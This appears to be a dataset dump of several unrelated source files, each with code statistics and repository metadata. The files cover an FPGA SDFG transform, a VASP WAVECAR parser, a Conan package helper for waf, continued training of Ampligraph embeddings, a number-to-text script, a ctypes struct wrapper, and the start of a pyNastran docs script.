modification_map_axpy = get_first_node(state, lambda x: isinstance(x, nodes.MapEntry) and
"axpy" in x.label and x.params[0] == "tile_i")
modification_map_dot = get_first_node(state, lambda x: isinstance(x, nodes.MapEntry) and
x.label == "stream" and x.params[0] == "tile_i")
array_updates = {"axpy_x": ("HBM", f"0:{banks_per_input}", [banks_per_input]),
"axpy_y": ("HBM", f"{banks_per_input}:{2*banks_per_input}", [banks_per_input]),
"dot_y": ("HBM", f"{2*banks_per_input}:{3*banks_per_input}", [banks_per_input]),
"result": ("DDR", "0", None)}
transform_sdfg_for_hbm(sdfg, ("k", banks_per_input), array_updates,
{(modification_map_axpy, 0): banks_per_input, (modification_map_dot, 0): banks_per_input})
    # The FPGA transform cannot be applied through normal pattern matching here,
    # because the stream is not inside a map and FPGA storage types and schedules
    # are already present. Since the actual application of FPGATransformSDFG is
    # non-destructive, we simply force its application.
fpga_xform = FPGATransformSDFG(sdfg.sdfg_id, -1, {}, -1)
fpga_xform.apply(sdfg)
sdfg.apply_transformations_repeated(InlineSDFG)
_modify_dot_host_side(sdfg, sdfg.start_state, sdfg.states()[2])
return sdfg
| 46.92437
| 115
| 0.689201
| 1,642
| 11,168
| 4.4324
| 0.13581
| 0.042869
| 0.069662
| 0.039297
| 0.513053
| 0.471833
| 0.413438
| 0.369195
| 0.355455
| 0.327013
| 0
| 0.01232
| 0.171472
| 11,168
| 238
| 116
| 46.92437
| 0.774235
| 0.051218
| 0
| 0.151351
| 0
| 0
| 0.080659
| 0.017893
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054054
| false
| 0
| 0.102703
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1 | 0 |
ee0db8b98c1815168cdf176d5c487ac08d4df051 | 1,134 | py | Python | aiida_vasp/parsers/file_parsers/wavecar.py | muhrin/aiida-vasp | 641fdc2ccd40bdd041e59af1fa3e1dcf9b037415 | ["MIT"] | 1 | 2021-06-13T09:13:01.000Z | 2021-06-13T09:13:01.000Z | aiida_vasp/parsers/file_parsers/wavecar.py | muhrin/aiida-vasp | 641fdc2ccd40bdd041e59af1fa3e1dcf9b037415 | ["MIT"] | null | null | null | aiida_vasp/parsers/file_parsers/wavecar.py | muhrin/aiida-vasp | 641fdc2ccd40bdd041e59af1fa3e1dcf9b037415 | ["MIT"] | null | null | null |
"""
WAVECAR parser.
---------------
The file parser that handles the parsing of WAVECAR files.
"""
from aiida_vasp.parsers.file_parsers.parser import BaseFileParser
from aiida_vasp.parsers.node_composer import NodeComposer
class WavecarParser(BaseFileParser):
"""Add WAVECAR as a single file node."""
PARSABLE_ITEMS = {
'wavecar': {
'inputs': [],
'name': 'wavecar',
'prerequisites': []
},
}
def __init__(self, *args, **kwargs):
super(WavecarParser, self).__init__(*args, **kwargs)
self._wavecar = None
self.init_with_kwargs(**kwargs)
    def _parse_file(self, inputs):
        """Create a DB Node for the WAVECAR file."""
        result = {}
        wfn = self._data_obj.path
        if wfn is None:
            return {'wavecar': None}
        result['wavecar'] = wfn
        return result
@property
def wavecar(self):
if self._wavecar is None:
composer = NodeComposer(file_parsers=[self])
self._wavecar = composer.compose('vasp.wavefun')
return self._wavecar
| 25.2
| 65
| 0.591711
| 121
| 1,134
| 5.347107
| 0.429752
| 0.068006
| 0.040185
| 0.061824
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.285714
| 1,134
| 44
| 66
| 25.772727
| 0.798765
| 0.145503
| 0
| 0
| 0
| 0
| 0.066246
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.107143
| false
| 0
| 0.071429
| 0
| 0.357143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1 | 0 |
ee0f6bdca365641ee9474e0436ab4c38b5187dad | 4,184 | py | Python | waflib/package.py | fannymagnet/cwaf | 60510f3596f1ee859ea73a50ee56dd636cde14b4 | ["Apache-2.0"] | null | null | null | waflib/package.py | fannymagnet/cwaf | 60510f3596f1ee859ea73a50ee56dd636cde14b4 | ["Apache-2.0"] | null | null | null | waflib/package.py | fannymagnet/cwaf | 60510f3596f1ee859ea73a50ee56dd636cde14b4 | ["Apache-2.0"] | null | null | null |
#! /usr/bin/env python
# encoding: utf-8
import re
import os
import subprocess
import json
class Package:
def __init__(self) -> None:
self.manager = ""
self.name = ""
self.version = ""
def toString(self):
print('package manager:' + self.manager)
print('package name:' + self.name)
print('package version:' + self.version)
class PackageRepo:
def __init__(self) -> None:
self.packages = {}
self.include_dirs = []
self.lib_dirs = []
self.stlibs = []
self.shlibs = []
def installPackages(self, packages):
pass
class PackageManager:
def __init__(self) -> None:
self.package_repos = {}
self.packages = {}
self.include_dirs = ['.']
self.lib_dirs = ['.']
self.stlibs = []
self.shlibs = []
self.add_package_repo("conan", ConanRepo)
def add_package_repo(self, name, repo_type):
self.package_repos[name] = repo_type()
def add_requires(self, *args):
pkgs = []
for arg in args:
            match_result = re.match(r'(.*)::(.*)/(.*)', arg)
            if match_result is None:
                print("invalid requirement, expected '<manager>::<name>/<version>': " + arg)
                continue
            pkg = Package()
pkg.manager = match_result.group(1)
pkg.name = match_result.group(2)
pkg.version = match_result.group(3)
pkgs.append(pkg)
self.addPackages(pkgs)
# TODO: call this in the end
self.installPackages()
def addPackage(self, package):
if package.manager in self.packages:
self.packages[package.manager].append(package)
else:
self.packages[package.manager] = [package]
def addPackages(self, packages):
for package in packages:
self.addPackage(package)
def installPackages(self):
for k, v in self.packages.items():
if k in self.package_repos:
repo = self.package_repos[k]
repo.installPackages(v)
for include_dir in repo.include_dirs:
self.include_dirs.append(include_dir)
for lib_dir in repo.lib_dirs:
self.lib_dirs.append(lib_dir)
for stlib in repo.stlibs:
self.stlibs.append(stlib)
for shlib in repo.shlibs:
self.shlibs.append(shlib)
else:
print("unsupported packaged manager: " + k)
continue
class ConanRepo(PackageRepo):
def __init__(self) -> None:
PackageRepo.__init__(self)
def installPackages(self, packages):
# gen conanfile.txt
conanfile_content = '[requires]\n'
for package in packages:
conanfile_content += package.name + '/' + package.version + '\n'
conanfile_content += '[generators]\njson'
print(conanfile_content)
self.installConanPackages(conanfile_content)
def installConanPackages(self, conanfile_content):
if not os.path.exists("tmp"):
os.makedirs("tmp")
        # Remember the original working directory instead of clobbering os.curdir
        prev_dir = os.getcwd()
os.chdir('tmp')
with open('conanfile.txt', 'w') as f:
f.write(conanfile_content)
cmd = "conan install . --build=missing"
        # Pass an argument list so this also works without a shell on POSIX
        subprocess.run(cmd.split())
with open('conanbuildinfo.json') as f:
data = json.loads(f.read())
options = data['options']
deps = data['dependencies']
for dep in deps:
print(dep['name'])
pkg_include_dirs = dep['include_paths']
for pkg_include_dir in pkg_include_dirs:
self.include_dirs.append(pkg_include_dir)
pkg_lib_dirs = dep['lib_paths']
for pkg_lib_dir in pkg_lib_dirs:
self.lib_dirs.append(pkg_lib_dir)
pkg_libs = dep['libs']
for pkg_lib in pkg_libs:
if options[pkg_lib]['shared'] == 'False':
self.stlibs.append(pkg_lib)
else:
self.shlibs.append(pkg_lib)
        os.chdir(prev_dir)
print("install conan packages finished")
| 28.462585
| 76
| 0.546845
| 452
| 4,184
| 4.884956
| 0.247788
| 0.048913
| 0.019928
| 0.027174
| 0.144022
| 0.103261
| 0.052536
| 0.052536
| 0.052536
| 0.052536
| 0
| 0.001459
| 0.344885
| 4,184
| 146
| 77
| 28.657534
| 0.804086
| 0.019598
| 0
| 0.158879
| 0
| 0
| 0.07176
| 0
| 0
| 0
| 0
| 0.006849
| 0
| 1
| 0.121495
| false
| 0.009346
| 0.037383
| 0
| 0.196262
| 0.065421
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1 | 0 |
ee0fd6c103aa5c0dda88b9b7d6ada7be67c461d9 | 16,951 | py | Python | excut/embedding/ampligraph_extend/EmbeddingModelContinue.py | mhmgad/ExCut | 09e943a23207381de3c3a9e6f70015882b8ec4af | ["Apache-2.0"] | 5 | 2020-11-17T19:59:49.000Z | 2021-09-23T23:10:39.000Z | excut/embedding/ampligraph_extend/EmbeddingModelContinue.py | mhmgad/ExCut | 09e943a23207381de3c3a9e6f70015882b8ec4af | ["Apache-2.0"] | null | null | null | excut/embedding/ampligraph_extend/EmbeddingModelContinue.py | mhmgad/ExCut | 09e943a23207381de3c3a9e6f70015882b8ec4af | ["Apache-2.0"] | null | null | null |
from copy import deepcopy
import numpy as np
import tensorflow as tf
from ampligraph.datasets import NumpyDatasetAdapter, AmpligraphDatasetAdapter
from ampligraph.latent_features import SGDOptimizer, constants
from ampligraph.latent_features.initializers import DEFAULT_XAVIER_IS_UNIFORM
from ampligraph.latent_features.models import EmbeddingModel
from ampligraph.latent_features.models.EmbeddingModel import ENTITY_THRESHOLD
from sklearn.utils import check_random_state
from tqdm import tqdm
from excut.utils.logging import logger
class EmbeddingModelContinue(EmbeddingModel):
def __init__(self, k=constants.DEFAULT_EMBEDDING_SIZE, eta=constants.DEFAULT_ETA, epochs=constants.DEFAULT_EPOCH,
batches_count=constants.DEFAULT_BATCH_COUNT, seed=constants.DEFAULT_SEED, embedding_model_params={},
optimizer=constants.DEFAULT_OPTIM, optimizer_params={'lr': constants.DEFAULT_LR},
loss=constants.DEFAULT_LOSS, loss_params={}, regularizer=constants.DEFAULT_REGULARIZER,
regularizer_params={}, initializer=constants.DEFAULT_INITIALIZER,
initializer_params={'uniform': DEFAULT_XAVIER_IS_UNIFORM}, large_graphs=False,
verbose=constants.DEFAULT_VERBOSE):
logger.warning('entities min_quality %i' % ENTITY_THRESHOLD)
super(EmbeddingModelContinue, self).__init__(k, eta, epochs, batches_count, seed, embedding_model_params,
optimizer, optimizer_params, loss,
loss_params, regularizer, regularizer_params, initializer,
initializer_params, large_graphs,
verbose)
self.tf_config = tf.ConfigProto(allow_soft_placement=True, device_count={"CPU": 40},
inter_op_parallelism_threads=40, intra_op_parallelism_threads=1)
def copy_old_model_params(self, old_model):
if not old_model.is_fitted:
            raise Exception('Old model is not fitted!')
self.ent_to_idx = deepcopy(old_model.ent_to_idx)
self.rel_to_idx = deepcopy(old_model.rel_to_idx)
# self.is_fitted = old_model_params['is_fitted']
# is_calibrated = old_model_params['is_calibrated']
old_model_params = dict()
old_model.get_embedding_model_params(old_model_params)
copied_params = deepcopy(old_model_params)
self.restore_model_params(copied_params)
def fit(self, X, early_stopping=False, early_stopping_params={}, continue_training=False):
"""Train an EmbeddingModel (with optional early stopping).
The model is trained on a training set X using the training protocol
described in :cite:`trouillon2016complex`.
Parameters
----------
X : ndarray (shape [n, 3]) or object of AmpligraphDatasetAdapter
Numpy array of training triples OR handle of Dataset adapter which would help retrieve data.
early_stopping: bool
Flag to enable early stopping (default:``False``)
early_stopping_params: dictionary
Dictionary of hyperparameters for the early stopping heuristics.
The following string keys are supported:
- **'x_valid'**: ndarray (shape [n, 3]) or object of AmpligraphDatasetAdapter :
Numpy array of validation triples OR handle of Dataset adapter which
would help retrieve data.
- **'criteria'**: string : criteria for early stopping 'hits10', 'hits3', 'hits1' or 'mrr'(default).
- **'x_filter'**: ndarray, shape [n, 3] : Positive triples to use as filter if a 'filtered' early
stopping criteria is desired (i.e. filtered-MRR if 'criteria':'mrr').
Note this will affect training time (no filter by default).
If the filter has already been set in the adapter, pass True
- **'burn_in'**: int : Number of epochs to pass before kicking in early stopping (default: 100).
        - **'check_interval'**: int : Early stopping interval after burn-in (default: 10).
- **'stop_interval'**: int : Stop if criteria is performing worse over n consecutive checks (default: 3)
- **'corruption_entities'**: List of entities to be used for corruptions. If 'all',
it uses all entities (default: 'all')
- **'corrupt_side'**: Specifies which side to corrupt. 's', 'o', 's+o' (default)
Example: ``early_stopping_params={x_valid=X['valid'], 'criteria': 'mrr'}``
"""
self.train_dataset_handle = None
        # The try-except block mainly handles cleanup in case of an exception or a manual stop in a Jupyter notebook
# TODO change 0: Update the mapping if there are new entities.
if continue_training:
self.update_mapping(X)
try:
if isinstance(X, np.ndarray):
# Adapt the numpy data in the internal format - to generalize
self.train_dataset_handle = NumpyDatasetAdapter()
self.train_dataset_handle.set_data(X, "train")
elif isinstance(X, AmpligraphDatasetAdapter):
self.train_dataset_handle = X
else:
msg = 'Invalid type for input X. Expected ndarray/AmpligraphDataset object, got {}'.format(type(X))
logger.error(msg)
raise ValueError(msg)
# create internal IDs mappings
            # TODO Change 1: first change, to reuse the existing mappings rel_to_idx and ent_to_idx
if not continue_training:
self.rel_to_idx, self.ent_to_idx = self.train_dataset_handle.generate_mappings()
else:
self.train_dataset_handle.use_mappings(self.rel_to_idx, self.ent_to_idx)
prefetch_batches = 1
if len(self.ent_to_idx) > ENTITY_THRESHOLD:
self.dealing_with_large_graphs = True
logger.warning('Your graph has a large number of distinct entities. '
'Found {} distinct entities'.format(len(self.ent_to_idx)))
logger.warning('Changing the variable initialization strategy.')
logger.warning('Changing the strategy to use lazy loading of variables...')
if early_stopping:
raise Exception('Early stopping not supported for large graphs')
if not isinstance(self.optimizer, SGDOptimizer):
raise Exception("This mode works well only with SGD optimizer with decay (read docs for details).\
Kindly change the optimizer and restart the experiment")
if self.dealing_with_large_graphs:
prefetch_batches = 0
# CPU matrix of embeddings
            # TODO Change 2.1: do not initialize if continuing training
if not continue_training:
self.ent_emb_cpu = self.initializer.get_np_initializer(len(self.ent_to_idx), self.internal_k)
self.train_dataset_handle.map_data()
# This is useful when we re-fit the same model (e.g. retraining in model selection)
if self.is_fitted:
tf.reset_default_graph()
self.rnd = check_random_state(self.seed)
tf.random.set_random_seed(self.seed)
self.sess_train = tf.Session(config=self.tf_config)
# change 2.2 : Do not change batch size with new training data, just use the old (for large KGs)
# if not continue_training:
batch_size = int(np.ceil(self.train_dataset_handle.get_size("train") / self.batches_count))
# else:
# batch_size = self.batch_size
logger.info("Batch Size: %i" % batch_size)
# dataset = tf.data.Dataset.from_tensor_slices(X).repeat().batch(batch_size).prefetch(2)
if len(self.ent_to_idx) > ENTITY_THRESHOLD:
logger.warning('Only {} embeddings would be loaded in memory per batch...'.format(batch_size * 2))
self.batch_size = batch_size
# TODO change 3: load model from trained params if continue instead of re_initialize the ent_emb and rel_emb
if not continue_training:
self._initialize_parameters()
else:
self._load_model_from_trained_params()
dataset = tf.data.Dataset.from_generator(self._training_data_generator,
output_types=(tf.int32, tf.int32, tf.float32),
output_shapes=((None, 3), (None, 1), (None, self.internal_k)))
dataset = dataset.repeat().prefetch(prefetch_batches)
dataset_iterator = tf.data.make_one_shot_iterator(dataset)
# init tf graph/dataflow for training
# init variables (model parameters to be learned - i.e. the embeddings)
if self.loss.get_state('require_same_size_pos_neg'):
batch_size = batch_size * self.eta
loss = self._get_model_loss(dataset_iterator)
train = self.optimizer.minimize(loss)
# Entity embeddings normalization
normalize_ent_emb_op = self.ent_emb.assign(tf.clip_by_norm(self.ent_emb, clip_norm=1, axes=1))
self.early_stopping_params = early_stopping_params
# early stopping
if early_stopping:
self._initialize_early_stopping()
self.sess_train.run(tf.tables_initializer())
self.sess_train.run(tf.global_variables_initializer())
try:
self.sess_train.run(self.set_training_true)
except AttributeError:
pass
normalize_rel_emb_op = self.rel_emb.assign(tf.clip_by_norm(self.rel_emb, clip_norm=1, axes=1))
if self.embedding_model_params.get('normalize_ent_emb', constants.DEFAULT_NORMALIZE_EMBEDDINGS):
self.sess_train.run(normalize_rel_emb_op)
self.sess_train.run(normalize_ent_emb_op)
epoch_iterator_with_progress = tqdm(range(1, self.epochs + 1), disable=(not self.verbose), unit='epoch')
# print("before epochs!")
# print(self.sess_train.run(self.ent_emb))
# print(self.sess_train.run(self.rel_emb))
for epoch in epoch_iterator_with_progress:
losses = []
for batch in range(1, self.batches_count + 1):
feed_dict = {}
self.optimizer.update_feed_dict(feed_dict, batch, epoch)
if self.dealing_with_large_graphs:
loss_batch, unique_entities, _ = self.sess_train.run([loss, self.unique_entities, train],
feed_dict=feed_dict)
self.ent_emb_cpu[np.squeeze(unique_entities), :] = \
self.sess_train.run(self.ent_emb)[:unique_entities.shape[0], :]
else:
loss_batch, _ = self.sess_train.run([loss, train], feed_dict=feed_dict)
if np.isnan(loss_batch) or np.isinf(loss_batch):
msg = 'Loss is {}. Please change the hyperparameters.'.format(loss_batch)
logger.error(msg)
raise ValueError(msg)
losses.append(loss_batch)
if self.embedding_model_params.get('normalize_ent_emb', constants.DEFAULT_NORMALIZE_EMBEDDINGS):
self.sess_train.run(normalize_ent_emb_op)
if self.verbose:
msg = 'Average Loss: {:10f}'.format(sum(losses) / (batch_size * self.batches_count))
if early_stopping and self.early_stopping_best_value is not None:
msg += ' — Best validation ({}): {:5f}'.format(self.early_stopping_criteria,
self.early_stopping_best_value)
logger.debug(msg)
epoch_iterator_with_progress.set_description(msg)
if early_stopping:
try:
self.sess_train.run(self.set_training_false)
except AttributeError:
pass
if self._perform_early_stopping_test(epoch):
self._end_training()
return
try:
self.sess_train.run(self.set_training_true)
except AttributeError:
pass
self._save_trained_params()
self._end_training()
except BaseException as e:
self._end_training()
raise e
def _load_model_from_trained_params(self):
"""Load the model from trained params.
While restoring make sure that the order of loaded parameters match the saved order.
It's the duty of the embedding model to load the variables correctly.
This method must be overridden if the model has any other parameters (apart from entity-relation embeddings).
        This function also sets the evaluation mode to do lazy loading of variables, based on the number of
        distinct entities present in the graph.
"""
        # Generate the batch size based on the entity count and batches_count
        # TODO change 4.1: keep the batch size from training if it was computed to a bigger number
self.batch_size = max(self.batch_size, int(np.ceil(len(self.ent_to_idx) / self.batches_count)))
# logger.warning('entities min_quality inside load model %i' % ENTITY_THRESHOLD)
# logger.warning('_load_model_from_trained_params is it a big graph yet? %s' % self.dealing_with_large_graphs)
if len(self.ent_to_idx) > ENTITY_THRESHOLD:
self.dealing_with_large_graphs = True
logger.warning('Your graph has a large number of distinct entities. '
'Found {} distinct entities'.format(len(self.ent_to_idx)))
logger.warning('Changing the variable loading strategy to use lazy loading of variables...')
logger.warning('Evaluation would take longer than usual.')
if not self.dealing_with_large_graphs:
self.ent_emb = tf.Variable(self.trained_model_params[0], dtype=tf.float32)
else:
self.ent_emb_cpu = self.trained_model_params[0]
            # TODO change 4.2: double the batch size for the lazily loaded entity embeddings
self.ent_emb = tf.Variable(np.zeros((self.batch_size * 2, self.internal_k)), dtype=tf.float32)
self.rel_emb = tf.Variable(self.trained_model_params[1], dtype=tf.float32)
def update_mapping(self, X):
"""
update entities and relations mappings in continue case
:param X:
:return:
"""
unique_ent = set(np.unique(np.concatenate((X[:, 0], X[:, 2]))))
unique_rel = set(np.unique(X[:, 1]))
new_unique_ent = unique_ent - set(self.ent_to_idx.keys())
new_unique_rel = unique_rel - set(self.rel_to_idx.keys())
        if len(new_unique_ent) > 0 or len(new_unique_rel) > 0:
logger.warning('Org entities (%i) or relations (%i)' % (len(self.ent_to_idx), len(self.rel_to_idx)))
logger.warning('New entities (%i) or relations (%i)'%(len(new_unique_ent), len(new_unique_rel)))
ent_id_start = max(self.ent_to_idx.values()) + 1
rel_id_start = max(self.rel_to_idx.values()) + 1
new_ent_count = len(new_unique_ent)
new_rel_count = len(new_unique_rel)
self.ent_to_idx.update(dict(zip(new_unique_ent, range(ent_id_start, ent_id_start+new_ent_count))))
self.rel_to_idx.update(dict(zip(new_unique_rel, range(rel_id_start, rel_id_start+new_rel_count))))
            # Extend the embedding vectors themselves with randomly initialized vectors
extend_ent_emb = self.initializer.get_np_initializer(new_ent_count, self.internal_k)
extend_rel_emb = self.initializer.get_np_initializer(new_rel_count, self.internal_k)
self.trained_model_params[0] = np.concatenate([self.trained_model_params[0], extend_ent_emb])
self.trained_model_params[1] = np.concatenate([self.trained_model_params[1], extend_rel_emb])
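# Hedged usage sketch (not from the original file): EmbeddingModel is abstract,
# so a concrete subclass mixing in this continue-training logic is assumed here.
# `ContinuableModel`, `X_initial`, and `X_new` are illustrative placeholders,
# not real ExCut or Ampligraph API.
def _example_continue_training(ContinuableModel, X_initial, X_new):
    model = ContinuableModel(k=100, epochs=50, batches_count=10)
    # The first fit builds ent_to_idx / rel_to_idx and trains from scratch
    model.fit(X_initial)
    # The second fit extends the mappings and embeddings (update_mapping) and
    # resumes from the trained parameters instead of re-initializing
    model.fit(X_new, continue_training=True)
    return model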
| 51.21148
| 128
| 0.610583
| 2,019
| 16,951
| 4.881129
| 0.203071
| 0.012684
| 0.012988
| 0.017047
| 0.290309
| 0.188432
| 0.149467
| 0.111923
| 0.096195
| 0.096195
| 0
| 0.006662
| 0.309303
| 16,951
| 330
| 129
| 51.366667
| 0.834985
| 0.2427
| 0
| 0.244565
| 0
| 0
| 0.070311
| 0.004074
| 0
| 0
| 0
| 0.006061
| 0
| 1
| 0.027174
| false
| 0.016304
| 0.059783
| 0
| 0.097826
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1 | 0 |
ee1052ee4cf13eb970ced19001be494a24ecb620 | 1,518 | py | Python | projects/Happy Times/num2txt.py | jsportland/jssmith.biz | 1184e4c0c011d0b9bfdbe8e813c08c2a9b436fdd | ["MIT"] | null | null | null | projects/Happy Times/num2txt.py | jsportland/jssmith.biz | 1184e4c0c011d0b9bfdbe8e813c08c2a9b436fdd | ["MIT"] | 7 | 2020-06-05T21:15:16.000Z | 2021-09-22T18:43:04.000Z | projects/Happy Times/num2txt.py | jsportland/jsportland.github.io | 1184e4c0c011d0b9bfdbe8e813c08c2a9b436fdd | ["MIT"] | null | null | null |
# num2txt.py
# Jeff Smith
'''
Convert a given number into its text representation.
e.g. 67 becomes 'sixty-seven'. Handles numbers from 0-999.
'''
# Create dictionaries of number-text key pairs
ones = {0: '', 1: 'one', 2: 'two', 3: 'three', 4: 'four',
5: 'five', 6: 'six', 7: 'seven', 8: 'eight', 9: 'nine'}
twos = {10: 'ten', 11: 'eleven', 12: 'twelve', 13: 'thirteen', 14: 'fourteen',
15: 'fifteen', 16: 'sixteen', 17: 'seventeen', 18: 'eighteen', 19: 'nineteen'}
tens = {0: '', 1: '', 2: 'twenty', 3: 'thirty', 4: 'forty',
5: 'fifty', 6: 'sixty', 7: 'seventy', 8: 'eighty', 9: 'ninety'}
huns = {0: '', 1: 'one hundred', 2: 'two hundred', 3: 'three hundred', 4: 'four hundred',
5: 'five hundred', 6: 'six hundred', 7: 'seven hundred', 8: 'eight hundred', 9: 'nine hundred'}
# Obtain input from console
num = int(input('Enter a number 0-999: '))
def textnum(num):
# Iterate through dictionaries for text matches to input
# Return text representations
if num == 0:
return 'zero'
elif num > 0 and num <= 9:
return ones[num]
elif num >= 10 and num <= 19:
return twos[num]
    elif num >= 20 and num <= 99:
        n1 = num // 10
        n2 = num % 10
        # Avoid a dangling hyphen on exact multiples of ten (e.g. 20 -> 'twenty')
        return tens[n1] + '-' + ones[n2] if n2 else tens[n1]
    elif num >= 100 and num < 1000:
        n1 = num // 100
        rem = num % 100
        # Reuse the 0-99 logic for the remainder; drop it entirely when zero
        if rem == 0:
            return f"{ones[n1]} hundred"
        return f"{ones[n1]} hundred, {textnum(rem)}"
    else:
        return "number out of range"
print(textnum(num))
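# Hedged examples (not in the original script) of the expected output, assuming
# the branch fixes above; values chosen to cover each branch:
# textnum(0)   -> 'zero'
# textnum(7)   -> 'seven'
# textnum(14)  -> 'fourteen'
# textnum(20)  -> 'twenty'
# textnum(67)  -> 'sixty-seven'
# textnum(305) -> 'three hundred, five'
# textnum(467) -> 'four hundred, sixty-seven'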
| 31.625
| 103
| 0.550725
| 220
| 1,518
| 3.8
| 0.490909
| 0.033493
| 0.011962
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.094897
| 0.264163
| 1,518
| 47
| 104
| 32.297872
| 0.653536
| 0.188406
| 0
| 0
| 0
| 0
| 0.284893
| 0.017241
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035714
| false
| 0
| 0
| 0
| 0.178571
| 0.071429
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1 | 0 |
ee1117aa879343fdc2d1539ab537208c88466d45 | 1,811 | py | Python | src/pointers/struct.py | ZeroIntensity/pointers.py | c41b0a131d9d538130cf61b19be84c6cdf251cb7 | ["MIT"] | 461 | 2022-03-10T03:05:30.000Z | 2022-03-31T17:53:32.000Z | src/pointers/struct.py | ZeroIntensity/pointers.py | c41b0a131d9d538130cf61b19be84c6cdf251cb7 | ["MIT"] | 7 | 2022-03-11T03:55:01.000Z | 2022-03-23T20:34:21.000Z | src/pointers/struct.py | ZeroIntensity/pointers.py | c41b0a131d9d538130cf61b19be84c6cdf251cb7 | ["MIT"] | 8 | 2022-03-10T19:30:37.000Z | 2022-03-23T20:35:11.000Z |
import ctypes
from typing import get_type_hints, Any
from abc import ABC
from .c_pointer import TypedCPointer, attempt_decode
from contextlib import suppress
class Struct(ABC):
"""Abstract class representing a struct."""
def __init__(self, *args, **kwargs):
hints = get_type_hints(self.__class__)
self._hints = hints
class _InternalStruct(ctypes.Structure):
_fields_ = [
(name, TypedCPointer.get_mapped(typ))
for name, typ in hints.items() # fmt: off
]
        # Pop the control flag first so it is not forwarded to the ctypes struct
        do_sync = kwargs.pop("do_sync", None)
        self._struct = _InternalStruct(*args, **kwargs)
        if do_sync is None or do_sync:
            self._sync()
@property
def _as_parameter_(self) -> ctypes.Structure:
return self._struct
@classmethod
def from_existing(cls, struct: ctypes.Structure):
instance = cls(do_sync=False)
instance._struct = struct
instance._sync()
return instance
def __getattribute__(self, name: str):
attr = super().__getattribute__(name)
with suppress(AttributeError):
hints = super().__getattribute__("_hints")
if (name in hints) and (type(attr)) is bytes:
attr = attempt_decode(attr)
return attr
def __setattr__(self, name: str, value: Any):
if hasattr(self, "_struct"):
self._struct.__setattr__(name, value)
super().__setattr__(name, value)
def _sync(self):
for name in self._hints:
setattr(self, name, getattr(self._struct, name))
def __repr__(self) -> str:
return f"<struct {self.__class__.__name__} at {hex(ctypes.addressof(self._struct))}>" # noqa
| 29.688525
| 102
| 0.59746
| 200
| 1,811
| 5.02
| 0.35
| 0.059761
| 0.023904
| 0.02988
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.29873
| 1,811
| 60
| 103
| 30.183333
| 0.790551
| 0.028713
| 0
| 0
| 0
| 0.023256
| 0.060284
| 0.037234
| 0
| 0
| 0
| 0
| 0
| 1
| 0.162791
| false
| 0
| 0.116279
| 0.046512
| 0.418605
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1 | 0 |
ee12205ea3c9735342c4affa7e463d604044c45b | 7,062 | py | Python | docs/html_docs/get_classes_in_file.py | ACea15/pyNastran | 5ffc37d784b52c882ea207f832bceb6b5eb0e6d4 | ["BSD-3-Clause"] | 293 | 2015-03-22T20:22:01.000Z | 2022-03-14T20:28:24.000Z | docs/html_docs/get_classes_in_file.py | ACea15/pyNastran | 5ffc37d784b52c882ea207f832bceb6b5eb0e6d4 | ["BSD-3-Clause"] | 512 | 2015-03-14T18:39:27.000Z | 2022-03-31T16:15:43.000Z | docs/html_docs/get_classes_in_file.py | ACea15/pyNastran | 5ffc37d784b52c882ea207f832bceb6b5eb0e6d4 | ["BSD-3-Clause"] | 136 | 2015-03-19T03:26:06.000Z | 2022-03-25T22:14:54.000Z |
from __future__ import print_function, unicode_literals
import os
from io import open
from pyNastran.utils.log import get_logger2
import shutil
IGNORE_DIRS = ['src', 'dmap', 'solver', '__pycache__',
'op4_old', 'calculix', 'bars', 'case_control',
'pch', 'old', 'solver', 'test', 'dev', 'bkp', 'bdf_vectorized']
MODS_SKIP = ['spike', 'shell_backup']
SKIP_DIRECTORIES = ['.svn', '.idea', '.settings', '.git', 'test', 'bkp', '__pycache__', 'dev',
'htmlcov', 'vtk_examples', 'SnakeRiverCanyon', 'M100', 'SWB']
SKIP_FILE_SUFFIX = [
'.pyc', '.pyx', # python
'.bdf', '.op2', '.f06', '.op4', '.dat', '.inp', # nastran
'.err', '.log', '.rej', '.db', '.db.jou', '.ses', '.ses.01', # patran
'.pptx',
'.png', '.gif', # pictures
'.txt', '.csv', '.out', '.coverage', '.whl', # generic
'.mapbc', '.front', '.flo', 'cogsg', '.bc', '.d3m', '.inpt', '.nml', # usm3d/fun3d
'.ele', '.node', '.smesh', '.off',
'.mk5', '.wgs', '.stl', '.fgrid', '.su2', '.obj', # other formats
